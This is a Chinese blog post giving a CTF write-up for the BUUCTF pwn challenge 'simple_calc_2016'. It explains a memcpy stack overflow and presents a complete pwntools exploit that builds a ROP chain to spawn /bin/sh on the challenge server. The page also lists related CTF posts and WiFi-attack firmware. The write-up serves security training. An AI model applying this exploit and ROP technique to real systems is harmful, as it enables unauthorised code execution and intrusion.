[BUUCTF-pwn] simple_calc_2016

最新推荐文章于 2023-05-06 00:08:28 发布
最新推荐文章于 2023-05-06 00:08:28 发布
阅读量291 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121918788
版权

先看漏点:

        正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。

char v26[40]; // [rsp+10h] [rbp-40h] BYREF
.......
       case 1:
          adds((__int64)"%d", (int)&v27, v22, v23, v24, v25);
          v14 = (_DWORD *)(v29 + 4LL * i);
          *v14 = dword_6C4A88;
          break;
        case 2:
          subs((__int64)"%d", (int)&v27, v22, v23, v24, v25);
          v14 = (_DWORD *)(v29 + 4LL * i);
          *v14 = dword_6C4AB8;
          break;
        case 3:
          muls((__int64)"%d", (int)&v27, v22, v23, v24, v25);
          v14 = (_DWORD *)(v29 + 4LL * i);
          *v14 = dword_6C4AA8;
          break;
        case 4:
          divs((__int64)"%d", (int)&v27, v22, v23, v24, v25);
          v14 = (_DWORD *)(v29 + 4LL * i);
          *v14 = dword_6C4A98;
          break;
        case 5:
          memcpy(v26, v29, 4 * v28);            // 将堆的内宾复制到栈中,导致栈溢出
          free(v29);
          return 0;
        default:
          v13 = "Invalid option.\n";
          puts("Invalid option.\n");
          break;

系统用的是静态编译,程序很长,里边有能找到的所有元素pop 的rdi,rax,rsi,rdx,只是/bin/sh有点麻烦,需要自己写。这里用execve的话rdi需要指向/bin/sh而并不知道栈地址,所以一个办法就是指rsp,rsp指向的是当前指令的下一个位置只要有一条call后边放/bin/sh 也就是mov rdi,rsp ...syscall; /bin/sh 这里找到一个

0x0000000000492468 : mov rdi, rsp ; call r12

再将r12置为syscall即可

完整exp:

from pwn import *


#p = process('./pwn')
p = remote('node4.buuoj.cn', 28600 )

def write(n):
    n += 100
    p.sendlineafter(b'=> ', b'2')
    p.sendlineafter(b"Integer x: ", str(n & 0xffffffff).encode())
    p.sendlineafter(b"Integer y: ", b'100')
    p.sendlineafter(b'=> ', b'2')
    p.sendlineafter(b"Integer x: ", str((n >> 32) + 100).encode())
    p.sendlineafter(b"Integer y: ", b'100')
    
context.log_level = 'debug'

mov_rdi_rsp_call_r12 = 0x0000000000492468 #: mov rdi, rsp ; call r12
pop_rdx_rsi = 0x0000000000437aa9 #: pop rdx ; pop rsi ; ret
pop_rax     = 0x000000000044db34 #: pop rax ; ret
pop_r12     = 0x0000000000400493 #: pop r12 ; ret
syscall     = 0x0000000000400488 #: syscall

p.sendlineafter(b"Expected number of calculations: ", b'255')

#rdx=0 rsi=0 rax=0x3b rdi=rsp=/bin/sh r12=syscall
[write(0) for i in range(9)]
write(pop_rdx_rsi)
write(0)
write(0)
write(pop_rax)
write(0x3b)
write(pop_r12)
write(syscall)
write(mov_rdi_rsp_call_r12)
write(int(b'/bin/sh'[::-1].hex(),16))

p.sendlineafter(b'=> ', b'5')

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋试验场 CTF夺旗赛(第二季)WEB calculate、calculate2
A_dmin的博客
10-27 1257
i春秋试验场 CTF夺旗赛(第二季)WEB calculate、calculate2 emmmm,这个比赛是10月26结束的,刚刚好那一天去i春秋逛了一下 恰好看见有这个比赛,就做了几道题目,这两个题是跑脚本的,计算网页类算式的那种 觉得有点意思就记录一下 两道题目其实差不多,写的这个脚本两道题都可以跑,,, 直接能出答案,失败了就多运行几次就行 其实这两道题是有区别的: 第二题每个数字都...
【CTF】SZTU课内练习WP1
最新发布
2301_76885465的博客
12-11 977
2.使用“python sqlmap.py -r “1.txt” --level 3 --batch”进行探测注入,然后使用“python sqlmap.py -r “1.txt” --level 3 --batch --dbs”获取数据库,然后依次获取表,字段,字段的内容,最后得到flag.2.进行抓包,将Get请求改为Post请求,并按要求将flag=输到8位数以上,得到。1.登录demo账户,发现有flag,点击发现没有权限查看,因此考虑越权访问。1.对IP进行扫描,发现/backend。
BUUCTF-练习场-WEB-第二部分(8道)
weixin_45908624的博客
03-30 324
BUUCTF-Web-8道
UNCTF2022 wp
网安小菜鸡
01-16 1005
UNCTF2022 wp
UNCTF 2021---Web wp
3tefanie丶zhou的博客
11-29 2528
【人间事,其实好坏之别,往往就只差那么一两句话,就可以好坏颠倒。气头上,多了一两句不该有的重话反话,平日里,少了一两句宽慰人心的废话好话。】
BUUCTF:[RoarCTF 2019]Easy Calc
末初的CSDN博客
10-19 1158
题目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc 查看源码 抓包发现calc.php 访问http://node3.buuoj.cn:28908/calc.php 很明显,代码执行绕过,前面源码也说了有WAF,这里绕过WAF有两种方法 在num前添加%20绕过对num的检测 HTTP走私之重复Content-Length绕过 首先看下phpinfo(),禁用了一大堆函数 使用scandir()函数+chr()函数绕过.
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
simple_calc
02-18
2016年的boston-key-party ctf的pwn题,该题目考察方式比较新颖,是入门练习的一道好题,题解链接:https://blog.csdn.net/A951860555/article/details/113841290
SimpleCalc:这是一个非常简单的计算器,它使用基本运算符和浮点数
03-07
简单计算 这是一个非常简单的计算器,它使用基本运算符和浮点数。 使用:python3 Calc.py
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
【总结】2021unctf校内(cry&misc)
jialuomore的博客
12-13 994
毕竟初次接触正规比赛题,没什么经验,题型也没见多少,再加上基础知识方面还很欠缺,不了解原理题目变化就会很头疼。 下面总结一下本次解题思路: misc LPL: 下载附件是一个zip压缩包,直接解压得到.png和.zip文件 图片win可以打开(linux打不开),没有信息,再看压缩包需要密码(010观察是真加密),无法爆破,猜测密码应该隐藏在图片中 010打开图片发现提示,根据官方wp...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 380
buuctf-pwn 001-016题wp
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1297
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
2019UNCTF-CRYPTO-simple_rsa
zippo1234的博客
11-04 822
2019UNCTF-CRYPTO-simple_rsasimple_rsa题目分析开始1.题目2.分析3.分解n4.求素数5.改n攻击6.脚本7.get flag结语参考 每天一题,只能多不能少 simple_rsa 题目分析 Pollard’s rho algorithm,PollardRho_p_1算法 小素数 n降低 开始 1.题目 简单粗暴的给了个原脚本: #!/usr/bin/env python2 # -*- coding:utf8 -*- from Crypto.Util.number i
UNCTF 竞技赛 simple_rsa
夜幕下的灯火阑珊的博客
11-29 501
将n写入txt文件,使用yafu分离n yafu-x64.exe "factor(@)" -batchfile rsa.txt a1-a56由yafu分离而得 其中部分数据不是素数,继续用yafu分解 得到所有的素因子,代入求解可得flag #coding:utf-8 from libnum import * import gmpy2 import binascii n = 3464115689...
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1248
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP的
0ctf之simple
公众号shadow sock7
09-03 1210
参考: http://www.ikey4u.com/blog/0ctf-2015-simpleapk/partB-analysis-solib/ 打开AndroidManifest.xml发现android:debuggable="true", 因此我们就不用修改什么了,可以直接调试。直接原 apk 上 IDA Pro动态调试即可.一般的我们都会开两个 IDA, 一个用于动态分析,一个用于静
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值